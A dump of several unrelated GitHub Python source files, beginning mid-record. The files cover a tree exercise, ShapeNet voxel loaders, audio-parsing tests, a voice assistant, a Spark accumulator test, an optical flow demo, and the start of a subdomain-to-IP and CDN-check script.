product.id,\n }\n })\n\n return {'status': 'ok',\n 'package_ids': package_list,\n }\n","repo_name":"Niboo/legal1","sub_path":"stock_irm/controllers/outbound_select_package.py","file_name":"outbound_select_package.py","file_ext":"py","file_size_in_byte":5112,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"35300019269","text":"# ! 
change LOCAL to False before submitting !\n# set LOCAL to True for local testing\n\nLOCAL = True\n\nif LOCAL:\n class Node: \n def __init__(self, left=None, right=None, value=0): \n self.right = right\n self.left = left\n self.value = value\n\n\ndef print_range(node, l, r):\n if node == None:\n return\n if node.value >= l:\n print_range(node.left, l, r)\n if l <= node.value and r >= node.value:\n print(node.value)\n if node.value <= r:\n print_range(node.right, l, r)\n\n\ndef test():\n node1 = Node(None, None, 2)\n node2 = Node(None, node1, 1)\n node3 = Node(None, None, 8)\n node4 = Node(None, node3, 8)\n node5 = Node(node4, None, 9)\n node6 = Node(node5, None, 10)\n node7 = Node(node2, node6, 5)\n print_range(node7, 2, 8)\n # expected output: 2 5 8 8\n\n\nif __name__ == '__main__':\n test()","repo_name":"YourKeysAreMine/Basic_Algorithms","sub_path":"trees/K_show_range.py","file_name":"K_show_range.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40013794860","text":"import os\nimport warnings\nfrom os import path\nfrom typing import Dict\n\nimport torch\nfrom pytorch3d.datasets.shapenet.shapenet_core import ShapeNetCore\n\nfrom conversions.color_interpolation import interpolate_colors\nfrom conversions.colored_voxels import atlas2vertex_color\nfrom conversions.kaolin_mesh_to_voxels import fill, extract_surface, trianglemeshes_to_colored_voxelgrids\n\n\nclass ShapeNetVoxels(ShapeNetCore):\n def __init__(self, data_dir, synsets=None, filled=True) -> None:\n \"\"\"\n Loads pre-calculated voxels objects from ShapeNet, in binvox format\n Store each object's synset id and models id from data_dir. It uses Trimesh library to encode voxels.\n\n Args:\n data_dir: Path to ShapeNetCore data.\n synsets: List of synset categories to load from ShapeNetCore in the form of\n synset offsets or labels. 
A combination of both is also accepted.\n When no category is specified, all categories in data_dir are loaded.\n filled: internal part are filled\n \"\"\"\n super().__init__(data_dir=data_dir,\n synsets=synsets,\n version=2,\n load_textures=False,\n texture_resolution=1)\n from trimesh.exchange.binvox import load_binvox\n self.load_binvox = load_binvox\n\n self.filled = filled\n self.model_dir = path.join(\"models\", f\"model_normalized.{'solid' if self.filled else 'surface'}.binvox\")\n\n # Re-extract model_id, but for .binvox files\n self.synset_ids = []\n self.model_ids = []\n self.synset_num_models = {}\n for synset in self.synset_start_idxs.keys():\n for model in os.listdir(path.join(data_dir, synset)):\n if not path.exists(path.join(data_dir, synset, model, self.model_dir)):\n msg = (\"Object file not found in the model directory %s \"\n \"under synset directory %s.\"\n ) % (model, synset)\n warnings.warn(msg)\n continue\n self.synset_ids.append(synset)\n self.model_ids.append(model)\n model_count = len(self.synset_ids) - self.synset_start_idxs[synset]\n self.synset_num_models[synset] = model_count\n\n def __getitem__(self, idx: int) -> Dict:\n \"\"\"\n Read a model by the given index.\n\n Args:\n idx: The idx of the model to be retrieved in the dataset.\n\n Returns:\n dictionary with following keys:\n - voxel (str): voxel representation using Trimesh VoxelGrid class for encoding\n - synset_id (str): synset id\n - model_id (str): model id\n - label (str): synset label.\n \"\"\"\n model = self._get_item_ids(idx)\n model_path = path.join(\n self.shapenet_dir, model[\"synset_id\"], model[\"model_id\"], self.model_dir\n )\n with open(model_path, 'rb') as file_obj:\n model[\"voxel\"] = self.load_binvox(file_obj, resolver=None, axis_order='xzy', file_type=None)\n model[\"label\"] = self.synset_dict[model[\"synset_id\"]]\n return model\n\n\nclass RawVoxelsShapeNetDataset(ShapeNetCore):\n \"\"\"\n The voxels are calculated from the ShapeNet mesh in the same way as for the Pkmn dataset,\n to be able to use transfer learning between the 2. 
This also allows to include the color of the voxels.\n \"\"\"\n\n def __init__(self, root_path, n_cubes, synsets=None):\n super(RawVoxelsShapeNetDataset, self).__init__(root_path, synsets=synsets, version=2, load_textures=True,\n texture_resolution=4)\n self.n_cubes = n_cubes\n\n def __getitem__(self, item):\n x = super().__getitem__(item)\n verts = x[\"verts\"]\n faces = x[\"faces\"]\n atlas_texture = x[\"textures\"]\n\n # Min-max normalization in [-1, 1], centered in 0\n verts = (verts - verts.min(dim=0)[0]) / (verts - verts.min(dim=0)[0]).max()\n verts = 2 * (verts - verts.max(dim=0)[0] / 2)\n\n # We use vertex color on the initial mesh, so faces size must be small enough in comparison of voxel size\n v_colors = atlas2vertex_color(vertices=verts, faces=faces, atlas_texture=atlas_texture, use_mean=True)\n v_colors = (v_colors * 255).clamp(min=0, max=255).to(torch.uint8)\n\n voxels, colored_voxels = trianglemeshes_to_colored_voxelgrids(\n [verts], [faces], self.n_cubes, verts_uvs=None, textures=[v_colors],\n origin=torch.tensor([[-1., -1., -1.]]),\n scale=torch.tensor([2.]),\n return_sparse=False\n )\n voxels = fill(voxels)\n colored_voxels = interpolate_colors(colorgrid=colored_voxels,\n voxelgrid=extract_surface(voxels),\n darken_outside=True)\n\n return {'synset_id': x['synset_id'], 'model_id': x['model_id'], 'label': x['label'],\n 'voxelgrid': voxels[0], 'colorgrid': colored_voxels[0]}\n\n\ndef save_entire_shapenet_voxels_dataset_on_disk(root_path, voxels_folder, n_cubes=64, synsets=None):\n \"\"\"\n Pre-computes colored voxels of the ShapeNet dataset, and store them on disk. They can then be loaded\n by VoxelsDataset class (see pkmn_dataset.py)\n :param root_path: ShapeNet path\n :param voxels_folder: Folder path on which to save voxels\n :param n_cubes: Dimension of the voxel grid (total number of voxels = n_cubes*n_cubes*n_cubes)\n :param synsets: ShapeNet synsets, see Pytorch3d's ShapeNetCore\n \"\"\"\n from tqdm import tqdm\n d = RawVoxelsShapeNetDataset(root_path=root_path, n_cubes=n_cubes, synsets=synsets)\n for i in tqdm(range(len(d))):\n try:\n data = d[i]\n except Exception as e: # Some samples fails, so it just skip them\n print(i, e)\n continue\n new_name = path.join(voxels_folder,\n data['synset_id'] + '_' + data['model_id'] + '_' + data['label'] +\n '_nc' + str(int(n_cubes)) + '.pt')\n indices = extract_surface(data['voxelgrid'].unsqueeze(0)).squeeze(0).nonzero()\n colors = data['colorgrid']\n\n torch.save(f=new_name, obj=(indices, colors))\n","repo_name":"le-Greg/generate-voxel-pkmns-with-deep-learning","sub_path":"datasets/shapenet_voxels.py","file_name":"shapenet_voxels.py","file_ext":"py","file_size_in_byte":6345,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"17814187971","text":"import contextlib\nimport logging\nimport re\nimport tempfile\nimport typing as tp\nimport zipfile\nfrom pathlib import Path\nfrom unittest.mock import patch\n\nimport pytest\nimport torch\nimport torchaudio\nfrom torchaudio.backend.common import AudioMetaData\n\nimport stopes.modules.speech.postprocess as sprocess\nimport stopes.modules.speech.utils as sputils\nfrom stopes.modules.speech.utils import Audio, AudioBytes, Text\n\n\n@pytest.fixture(scope=\"module\")\ndef sample_audio():\n with contextlib.ExitStack() as stack:\n tmpdir = stack.enter_context(tempfile.TemporaryDirectory())\n lll_data = torchaudio.datasets.LibriLightLimited(tmpdir, download=\"True\")[0]\n\n audio_path = tmpdir + \"/tmp.ogg\"\n 
torchaudio.save(audio_path, lll_data[0], lll_data[1], format=\"ogg\")\n num_frames = torchaudio.info(tmpdir + \"/tmp.ogg\").num_frames\n\n audio_zip_path = tmpdir + \"/tmp.zip\"\n zip_o = stack.enter_context(zipfile.ZipFile(audio_zip_path, \"w\"))\n with zip_o.open(\"tmp.ogg\", mode=\"w\") as sample_o:\n sample_start = int(sample_o._fileobj.tell()) # type: ignore[attr-defined]\n torchaudio.save(sample_o, lll_data[0], lll_data[1], format=\"ogg\")\n sample_end = int(sample_o._fileobj.tell()) # type: ignore[attr-defined]\n\n yield (audio_path, num_frames), (audio_zip_path, sample_start, sample_end)\n\n\ndef test_speech_utils_parse_audio(caplog: pytest.LogCaptureFixture) -> None:\n \"\"\"\n Expected audio formats (by priority):\n 1. full audio file: \n 2. time slice: |||\n 3. frame slice: \n \"\"\"\n # Invalid samples\n with pytest.raises(ValueError):\n # Too many parts\n sputils.parse_audio(\"path 10 15 20 30 40\")\n with pytest.raises(ValueError):\n # mixed space and pipe\n sputils.parse_audio(\"path 10|15 20\")\n with pytest.raises(ValueError):\n # start_not_int\n sputils.parse_audio(\"path start 10 15\")\n\n # Pipe separated (ms)\n with pytest.raises(RuntimeError):\n # no sample rate specified nor supplied\n sputils.parse_audio(\"path|10|15\")\n with assert_warns(\n caplog, match=\"Sampling factor not present in file, using provided value\"\n ):\n assert sputils.parse_audio(\"path|10|15\", sampling_factor=48) == Audio(\n \"path\", 480, 720, 48, sep=\"|\"\n )\n assert sputils.parse_audio(\"path|10|15|48\") == Audio(\"path\", 480, 720, 48, sep=\"|\")\n\n # Space separated (frames)\n with assert_warns(\n caplog, match=\"Sampling factor is assumed to be 16 for space-split text\"\n ):\n assert sputils.parse_audio(\"path 10 15\") == Audio(\"path\", 10, 15, 16, sep=\" \")\n with assert_warns(\n caplog, match=\"Sampling factor is assumed to be 16 for space-split text\"\n ):\n assert sputils.parse_audio(\"path 10 15\", 48) == Audio(\n \"path\", 10, 15, 16, sep=\" \"\n )\n with assert_warns(\n caplog, match=\"Sampling factor is assumed to be 16 for space-split text\"\n ):\n # with space separated, the 4-th column is a \"batch id\" not a sample rate\n assert sputils.parse_audio(\"path 10 15 32\") == Audio(\n \"path\", 10, 15, 16, sep=\" \"\n )\n with assert_warns(\n caplog, match=\"Sampling factor is assumed to be 16 for space-split text\"\n ):\n assert sputils.parse_audio(\"path 10 15 32\", 48) == Audio(\n \"path\", 10, 15, 16, sep=\" \"\n )\n\n # The warning is not outputted if you try a second time.\n assert caplog.messages == []\n assert sputils.parse_audio(\"path 10 15\") == Audio(\"path\", 10, 15, 16, sep=\" \")\n assert caplog.messages == []\n\n\n@pytest.mark.parametrize(\n \"sampling_factor,expected_output\",\n [\n (None, Audio(\"path\", 0, 43008, 16, sep=\"|\")),\n (8, Audio(\"path\", 0, 43008, 8, sep=\"|\")),\n ],\n)\ndef test_speech_utils_parse_audio_when_audio_path_exists(\n sampling_factor, expected_output\n):\n with patch(\"pathlib.Path.exists\", return_value=True):\n with patch(\n \"torchaudio.info\",\n return_value=AudioMetaData(\n sample_rate=16000,\n num_frames=43008,\n num_channels=1,\n bits_per_sample=32,\n encoding=\"PCM_F\",\n ),\n ):\n assert (\n sputils.parse_audio(\"path\", sampling_factor=sampling_factor)\n == expected_output\n )\n\n\n@pytest.mark.xfail()\ndef test_audio_duration() -> None:\n audio_frames = Audio(\"path\", 16_000, 32_000, 16, sep=\" \")\n audio_ms = Audio(\"path\", 1000, 2000, 16, sep=\"|\")\n # TODO: duration isn't correctly computed for Audio using ms as 
unit\n assert audio_frames.duration == audio_ms.duration\n\n\ndef test_speech_utils_parse_audio_or_text(caplog) -> None:\n # format 1: -> wav sampling\n # format 2: || -> ms sampling\n start = 10\n end = 15\n\n too_many_spaces = Text(\"path 10 15 20 30 40\")\n too_few_spaces = Text(\"path 10\")\n pipe_space_mixed = Text(\"path 10|15 20\")\n start_not_int = Text(\"path start 10 15\")\n audio_wav = Audio(path=\"path\", start=start, end=end, sampling_factor=16, sep=\" \")\n audio_ms = Audio(path=\"path\", start=start, end=end, sampling_factor=1, sep=\"|\")\n\n wav_string = str(audio_wav)\n ms_string = str(audio_ms)\n texts = [too_many_spaces, too_few_spaces, pipe_space_mixed, start_not_int]\n for text in texts:\n assert sputils.parse_audio_or_text(text.content) == text\n\n with pytest.raises(RuntimeError):\n sputils.parse_audio_or_text(\"path|10|15\")\n\n with assert_warns(\n caplog, match=\"Sampling factor not present in file, using provided value\"\n ):\n sputils.parse_audio_or_text(\"path|10|15\", sampling_factor=1)\n\n assert sputils.parse_audio_or_text(wav_string, sampling_factor=1) == audio_wav\n assert audio_wav.duration == audio_ms.duration / 16\n assert sputils.parse_audio_or_text(ms_string) == audio_ms\n\n\ndef test_speech_utils_convert_to_string() -> None:\n part1 = \"path 5 10 16\"\n part2 = \"path|100|120|16\"\n input_string = f\"1.5\\t{part1}\\t{part2}\"\n mined_result = sputils.split_mining_line(input_string)\n\n rev_part_1 = str(mined_result.src)\n rev_part_2 = str(mined_result.tgt)\n assert f\"{mined_result.score}\\t{rev_part_1}\\t{rev_part_2}\" == input_string\n\n\ndef test_compute_overlap() -> None:\n audio_1 = Audio(\"\", 0, 10)\n audio_2 = Audio(\"\", 15, 25)\n audio_3 = Audio(\"\", 5, 17)\n assert sputils.compute_overlap(audio_1, audio_2) == 0\n assert sputils.compute_overlap(audio_1, audio_2, sputils.IntersectMethods.IOU) == 0\n assert round(sputils.compute_overlap(audio_1, audio_3), 3) == round(5.0 / 12.0, 3)\n assert round(\n sputils.compute_overlap(audio_1, audio_3, sputils.IntersectMethods.IOU), 3\n ) == round(5.0 / 17.0, 3)\n\n\ndef test_postprocess() -> None:\n processor = sprocess.PostProcessAudioModule(\n sprocess.PostProcessAudioConfig(\n output_dir=Path(\"/\"),\n output_filename=\"test.tsv.gz\",\n mining_result_path=Path(\"/\"),\n min_audio_length=2,\n mining_threshold=1,\n max_overlap=0.1,\n )\n )\n # check filters on length and score\n audio_path = \"/path/to/example\"\n # valid:\n assert processor.line_passes_thresholds(\n sputils.MiningLineResult(\n score=1.1,\n src=Audio(audio_path, start=5, end=10, sampling_factor=1, sep=\" \"),\n tgt=Text(\"a\"),\n )\n )\n\n # score too low:\n assert not processor.line_passes_thresholds(\n sputils.MiningLineResult(\n score=0.9,\n src=Audio(path=audio_path, start=-100, end=0, sampling_factor=1, sep=\" \"),\n tgt=Text(\"b\"),\n )\n )\n # duration too small\n assert not processor.line_passes_thresholds(\n sputils.MiningLineResult(\n 1.1,\n Audio(audio_path, -1, 0, sampling_factor=1, sep=\" \"),\n Text(\"c\"),\n )\n )\n\n # check accurate removal of overlapping segments\n sources = {\n audio_path: [\n sputils.MiningLineResult(\n 1.1,\n Audio(audio_path, 5, 10, sampling_factor=1, sep=\" \"),\n Text(\"a\"),\n ),\n sputils.MiningLineResult(\n 1.2,\n Audio(audio_path, 6, 10, sampling_factor=1, sep=\" \"),\n Text(\"b\"),\n ), # score too low\n sputils.MiningLineResult(\n 1.1,\n Audio(audio_path, 6, 11, sampling_factor=1, sep=\" \"),\n Text(\"c\"),\n ), # too small fragment\n ]\n }\n filtered, _ = 
processor.postprocess(sources=sources)\n assert len(filtered) == 1\n assert filtered[0].tgt.content == \"b\" # type: ignore\n\n\ndef test_parse_audio_deprecated():\n assert sputils.parse_audio_deprecated(\"file.mp3\") == (\"file.mp3\", None, None, None)\n with pytest.raises(ValueError):\n sputils.parse_audio_deprecated(\"file.mp3 21\")\n\n assert sputils.parse_audio_deprecated(\"file.mp3 21 421\") == (\n \"file.mp3\",\n 21,\n 421,\n None,\n )\n assert sputils.parse_audio_deprecated(\"file.mp3 21 421 382\") == (\n \"file.mp3\",\n 21,\n 421,\n 382,\n )\n assert sputils.parse_audio_deprecated(\"file.mp3 21 421 382 dummy\") == (\n \"file.mp3\",\n 21,\n 421,\n 382,\n )\n\n with pytest.raises(ValueError):\n sputils.parse_audio_deprecated(\"file.mp3 21 text\")\n with pytest.raises(ValueError):\n sputils.parse_audio_deprecated(\"file.mp3 21 20\")\n assert sputils.parse_audio_deprecated(\"file.mp3 21 -1\") == (\n \"file.mp3\",\n 21,\n -1,\n None,\n )\n\n\ndef test_parse_audio_can_replace_deprecated(tmp_path: Path):\n assert sputils.parse_audio_deprecated(\"file.mp3\") == (\"file.mp3\", None, None, None)\n\n with pytest.raises(ValueError):\n sputils.parse_audio_deprecated(\"file.mp3 21\")\n\n assert sputils.parse_audio_deprecated(\"file.mp3 21 421\") == (\n \"file.mp3\",\n 21,\n 421,\n None,\n )\n assert sputils.parse_audio_deprecated(\"file.mp3 21 421 382\") == (\n \"file.mp3\",\n 21,\n 421,\n 382,\n )\n assert sputils.parse_audio_deprecated(\"file.mp3 21 421 382 dummy\") == (\n \"file.mp3\",\n 21,\n 421,\n 382,\n )\n\n with pytest.raises(ValueError):\n sputils.parse_audio_deprecated(\"file.mp3 21 text\")\n with pytest.raises(ValueError):\n sputils.parse_audio_deprecated(\"file.mp3 21 20\")\n assert sputils.parse_audio_deprecated(\"file.mp3 21 -1\") == (\n \"file.mp3\",\n 21,\n -1,\n None,\n )\n\n\ndef test_parse_audio_with_resample(sample_audio, caplog):\n audio_path, num_frames = sample_audio[0]\n start_ms, end_ms = 0, int(num_frames / 32)\n audio_text = f\"{audio_path}|{start_ms}|{end_ms}\"\n auto_meta = sputils.parse_audio_or_text(audio_text, sampling_factor=32)\n assert isinstance(auto_meta, Audio)\n\n with assert_warns(caplog, match=\"Audio has sample rate 16000. Resample to 32000\"):\n s = auto_meta.load()\n assert s.dim() == 2\n assert s.shape[1] == 351808\n\n\ndef test_parse_audio_bytes_with_resample(sample_audio, caplog):\n audio_zip_path, start, end = sample_audio[1]\n audio_text = f\"{audio_zip_path}:{start}:{end-start}\"\n auto_meta = sputils.parse_audio_or_text(audio_text, sampling_factor=32)\n assert isinstance(auto_meta, AudioBytes)\n\n with assert_warns(caplog, match=\"Audio has sample rate 16000. 
Resample to 32000\"):\n s = auto_meta.load()\n assert s.dim() == 2\n assert s.shape[1] == 351840\n\n\n@pytest.mark.parametrize(\"gpu\", [True, False])\n@pytest.mark.parametrize(\"fp16\", [True, False])\n@pytest.mark.parametrize(\"custom_read_func\", [True, False])\ndef test_load_audio_in_devices(sample_audio, gpu, fp16, custom_read_func, caplog):\n # TODO: move load_audio to speech_utils\n from stopes.modules.speech.speech_units import load_audio\n from stopes.modules.speech.utils import read_audio\n\n audio_path, num_frames = sample_audio[0]\n fake_read_func = lambda *a: torch.zeros(1) # noqa\n read_func = fake_read_func if custom_read_func else read_audio # ignore[assignment]\n line = f\"{audio_path}|0|{num_frames}|16\\tcoluimn2\"\n load_res = load_audio(\n 0, gpu, fp16, line, sampling_factor=32, read_audio_func=read_func # type: ignore[arg-type]\n )\n assert load_res[0] == line\n if custom_read_func:\n expected_wav = torch.zeros(1)\n if gpu and torch.cuda.is_available():\n expected_wav = expected_wav.cuda()\n if fp16:\n expected_wav = expected_wav.half()\n assert torch.equal(load_res[1], expected_wav) # type: ignore[arg-type]\n line_no_sample = f\"{audio_path}|0|{num_frames}\\tcoluimn2\"\n with assert_warns(\n caplog, match=\"Sampling factor not present in file, using provided value.\"\n ):\n assert load_audio(0, gpu, fp16, line_no_sample)[0] == line_no_sample\n\n\n@contextlib.contextmanager\ndef assert_warns(caplog, *, match: str) -> tp.Iterator[None]:\n caplog.clear()\n sputils.warn_once.cache_clear()\n\n with caplog.at_level(logging.WARN):\n yield\n assert len(caplog.messages) == 1\n assert re.match(match, caplog.messages[0])\n caplog.clear()\n\n\ndef test_read_audio(tmp_path: Path):\n \"\"\"Testing that read_audio returns a waveform of the correct shape\"\"\"\n wav_path = str(tmp_path / \"wav_old.wav\")\n torch.manual_seed(0)\n\n # Creating a 3-second bi-channel waveform with non-standard sr and saving as .wav\n dur_old = 3\n sr_old = 48000\n wav_old = torch.randn([2, dur_old * sr_old])\n torchaudio.save(wav_path, wav_old, sample_rate=sr_old)\n\n # loading the audio with utils\n sr_new = 16000\n wav_new = sputils.read_audio(wav_path, sampling_rate=sr_new)\n assert (\n len(wav_new.shape) == 1\n ), f\"The loaded wave should be 1D tensor, but it has shape {wav_new.shape}\"\n dur_new = wav_new.shape[-1] / sr_new\n assert (\n dur_new == dur_old\n ), f\"The wav had duration of {dur_old} sec. 
but was loaded having {dur_new} sec.\"\n","repo_name":"facebookresearch/stopes","sub_path":"stopes/modules/tests/test_speech_utils.py","file_name":"test_speech_utils.py","file_ext":"py","file_size_in_byte":14304,"program_lang":"python","lang":"en","doc_type":"code","stars":209,"dataset":"github-code","pt":"72"} +{"seq_id":"36342563557","text":"import openai\nopenai.api_key = \"put api key here\"\n\nimport pyttsx3\nimport datetime\nimport speech_recognition as sr\nimport wikipedia\nimport webbrowser\n\nimport os\nimport random\n\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.chrome.service import Service\nfrom webdriver_manager.chrome import ChromeDriverManager\nimport time\n\nimport requests, json\n\nfrom geopy.geocoders import Nominatim\n\ngeolocator = Nominatim(user_agent=\"geoapiExercises\")\n\n\n\n#register chrome as default web browser (raw string so the backslashes in the path stay literal)\nwebbrowser.register('chrome',None,webbrowser.BackgroundBrowser(r\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\"))\n\nengine = pyttsx3.init('sapi5')\nvoices = engine.getProperty('voices')\n# for voice in voices:\n#     print(f\"Voice: {voice.name}\")\nengine.setProperty('voice',voices[1].id)\n\n\n\n\n#speak function\ndef speak(audio):\n    engine.say(audio)\n    engine.runAndWait()\n\ndef intro():\n    hour = int(datetime.datetime.now().hour)\n    if hour>=4 and hour<12:\n        speak(\"Good Morning!\")\n    elif hour >=12 and hour<18:\n        speak(\"Good Afternoon!\")\n    else:\n        speak(\"Good Evening!\")\n    speak(\"I am your assistant Drishti, How may I help you ?\")\n\ndef takeCommand():\n    #audio to string\n    r=sr.Recognizer()\n    with sr.Microphone() as source:\n        print(\"Listening...\")\n        r.pause_threshold=1\n        audio = r.listen(source)\n\n    try:\n        print(\"Recognizing...\")\n        query = r.recognize_google(audio, language='en-IN')\n        print(f\"User said: {query}\\n\")\n\n    except Exception as e:\n        # print(e)\n        print(\"Say that again please...\")\n        return \"None_354465\" #coded string\n\n    return query\n\n#to get current location\ndef getLocation():\n    options = Options()\n    options.add_argument(\"--use--fake-ui-for-media-stream\")\n    driver = webdriver.Chrome(service=Service(ChromeDriverManager().install()),options=options)\n    timeout = 20\n    driver.get(\"https://mycurrentlocation.net/\")\n    wait = WebDriverWait(driver, timeout)\n    time.sleep(3)\n\n    longitude = driver.find_elements(\"xpath\", '//*[@id=\"longitude\"]')\n    longitude = [x.text for x in longitude]\n    longitude = str(longitude[0])\n    latitude = driver.find_elements(\"xpath\", '//*[@id=\"latitude\"]')\n    latitude = [x.text for x in latitude]\n    latitude = str(latitude[0])\n    driver.quit()\n    print(latitude,longitude)\n    location = geolocator.reverse(latitude+\",\"+longitude)\n    print(location)\n    return(latitude,longitude,location)\n\ndef getweather():\n\n    api_key = 'openweather_api_key_here'\n    # single call instead of two: every getLocation() call launches a fresh browser session\n    lat, lon, _ = getLocation()\n\n    # f-string, so the coordinates and the API key are actually substituted into the URL\n    complete_url = f\"https://api.openweathermap.org/data/2.5/weather?lat={lat}&lon={lon}&appid={api_key}\"\n    response = requests.get(complete_url)\n    x = response.json()\n\n    if x[\"cod\"] != \"404\":\n\n        y = x[\"main\"]\n        current_temperature = y[\"temp\"]-273.15\n        current_pressure = y[\"pressure\"]/1000.0\n        current_humidity = y[\"humidity\"]\n\n        z = x[\"weather\"]\n        weather_description = z[0][\"description\"]\n\n        # print following values\n        print(\" Temperature (in celsius unit) = \" +\n              str(current_temperature) +\n              \"\\n atmospheric pressure (in bar) = \" +\n              
str(current_pressure) +\n              \"\\n humidity (in percentage) = \" +\n              str(current_humidity) +\n              \"\\n description = \" +\n              str(weather_description))\n\n        speak(f\"According to OpenWeatherMap.org {weather_description} is expected at your location \" +\n              f\"\\n with current temperature of {current_temperature} degrees celsius \" +\n              f\"\\n Atmospheric pressure is {current_pressure} bar and humidity is {current_humidity} percent\")\n\n    else:\n        print(\"Sorry, Weather Report not found\")\n        speak(\"Sorry, Weather Report not found\")\n\n#chatgpt integration\ndef gpt_response(query):\n    model_engine = \"text-davinci-003\"\n\n    response = openai.Completion.create(\n        engine=model_engine,\n        prompt=query,\n        max_tokens=1024,\n        n=1,\n        stop=None,\n        temperature=0.5,)\n    response = response.choices[0].text\n    print(response)\n    return response\n\n\nif __name__ == \"__main__\":\n    intro()\n    flag = 0 #to check if last response of bot was successful\n    while True:\n        query = takeCommand().lower()\n\n        #logic for executing tasks on query\n        if 'drishti stop' in query:\n            break\n\n        elif 'gpt' in query:\n            speak(gpt_response(query))\n\n            flag = 0\n\n        elif 'wikipedia' in query:\n            speak('Searching Wikipedia...')\n            query = query.replace(\"wikipedia\",\"\")\n            results = wikipedia.summary(query,sentences = 2)\n            speak(\"According to Wikipedia,\")\n            print(results)\n            speak(results)\n\n            flag = 0\n\n        elif 'play music' in query:\n            music_dir = 'pathto\\d_bot\\music'\n            songs = os.listdir(music_dir)\n            print(songs)\n            play = random.choice(songs)\n            os.startfile(os.path.join(music_dir, play))\n\n        elif 'the time' in query:\n            strTime = datetime.datetime.now().strftime(\"%H:%M:%S\")\n            speak(f\"The time is {strTime}\")\n\n            flag = 0\n\n        elif 'my location' in query:\n            speak(f\"Your current location is {getLocation()[2]}\")\n\n            flag = 0\n\n        elif 'weather' in query:\n            getweather()\n\n            flag = 0\n\n        elif query != \"None_354465\":\n            if flag == 0:\n                speak(\"Sorry I can't help with that. Please try again ...\")\n                flag = 1\n\n","repo_name":"nomaan-2k/d_bot","sub_path":"drishti_bot.py","file_name":"drishti_bot.py","file_ext":"py","file_size_in_byte":5804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19547091257","text":"from pyspark import SparkConf, SparkContext\n\nsc = SparkContext(\"local\", \"test\")\ninvalid = sc.accumulator(0)\n\ndef count_invalid(el):\n    invalid.add(el)\n    return el\n\ninfo = sc.parallelize([3,4,5])\ninfo2 = info.map(lambda x: count_invalid(x))\n\nfor x in info2.collect():\n    print(x)\n\nprint(invalid)\nsc.stop()\n","repo_name":"sency90/allCode","sub_path":"bigdata/finals/practice/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"70738534632","text":"# Copyright 2023 Abhinav Kumar. 
All Rights Reserved.\r\n#\r\n# Licensed under the Apache License, Version 2.0 (the \"License\");\r\n# you may not use this file except in compliance with the License.\r\n# You may obtain a copy of the License at\r\n#\r\n# http://www.apache.org/licenses/LICENSE-2.0\r\n#\r\n# Unless required by applicable law or agreed to in writing, software\r\n# distributed under the License is distributed on an \"AS IS\" BASIS,\r\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n# See the License for the specific language governing permissions and\r\n# limitations under the License.\r\n# ==============================================================================\r\n\r\nimport numpy as np\r\nimport cv2\r\n\r\ncapture = cv2.VideoCapture(0)\r\n\r\n# Get initial frame\r\nresponse, first_frame = capture.read()\r\nfirst_gray = cv2.cvtColor(first_frame, cv2.COLOR_BGR2GRAY)\r\nhsv = np.zeros_like(first_frame)\r\nhsv[..., 1] = 255\r\n\r\nwhile True:\r\n    response, frame = capture.read()\r\n    frame = cv2.flip(frame, 1)\r\n    frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\r\n\r\n    # Calculates dense optical flow\r\n    dense_flow = cv2.calcOpticalFlowFarneback(first_gray, frame, None, 0.5, 4, 13, 5, 7, 1.5, 0)\r\n\r\n    # Calculate speed and angle(theta) of motion\r\n    speed, theta = cv2.cartToPolar(dense_flow[..., 0], dense_flow[..., 1])\r\n    hsv[..., 0] = theta * (90 / np.pi)  # map [0, 2*pi) into OpenCV's 8-bit hue range [0, 180)\r\n    hsv[..., 2] = cv2.normalize(speed, None, 0, 255, cv2.NORM_MINMAX)\r\n    final = cv2.cvtColor(hsv, cv2.COLOR_HSV2BGR)\r\n\r\n    cv2.imshow('Dense Optical Flow', final)\r\n    if cv2.waitKey(1) & 0xFF == ord('q'):\r\n        break\r\n\r\n    first_gray = frame\r\n\r\ncv2.destroyAllWindows()\r\ncapture.release()\r\n","repo_name":"abhinav16aero/cv","sub_path":"Object_Tracking_Detection/ObjectTracking_DenseOptical.py","file_name":"ObjectTracking_DenseOptical.py","file_ext":"py","file_size_in_byte":1712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42064088739","text":"from socket import gethostbyname_ex\nfrom queue import Queue\nfrom threading import Thread, Lock\nfrom core.sql_helper import SQL_helper\nfrom rich.console import Console\nimport subprocess\nimport nmap\nimport json\nfrom lib import config\n\nconsole = Console()\nlock = Lock()\nurl_tag = config.url_tag\n\n\n# Resolve database domains to IPs, check for CDN, and write back to the database\nclass Domain2IP(Thread):\n    def __init__(self, domain_queue):\n        super(Domain2IP, self).__init__()\n        self._domain_queue = domain_queue\n\n    def run(self):\n        while not self._domain_queue.empty():\n            domain = self._domain_queue.get()  # take a domain\n            try:\n                _res = gethostbyname_ex(domain)\n                # print(f'domain:{_res[0]} , aliases:{_res[1]} , ip list:{_res[2]}')\n                if len(_res[2]) != 1:\n                    console.print('[warning] ' + domain + ' cdn checked...', style='bold yellow')\n                    # self._res_list.append([_res[0], ','.join(_res[1]), ','.join(_res[2])])\n                    SQL_helper.update_subdomain_sql(\"cdn_checked\", 'True', domain)\n                else:\n                    # self._res_list.append([_res[0], ','.join(_res[1]), ','.join(_res[2])])\n                    # update the ip and cdn fields\n                    SQL_helper.update_subdomain_sql(_res[2][0], 'False', domain)\n            except Exception as e:\n                console.print(\"[warning]\" + domain + \" resolution failed, host not alive!\", style='bold yellow')\n            finally:\n                self._domain_queue.task_done()\n\n\ndef ip_domain_cdn():\n    domain_queue = Queue()\n    # read rows from the database into the check queue\n    subdomains_list = SQL_helper.read_subdomain_sql()\n    # print(subdomains_list)\n    for sub_tuple in subdomains_list:\n        # print(sub_tuple[1])\n        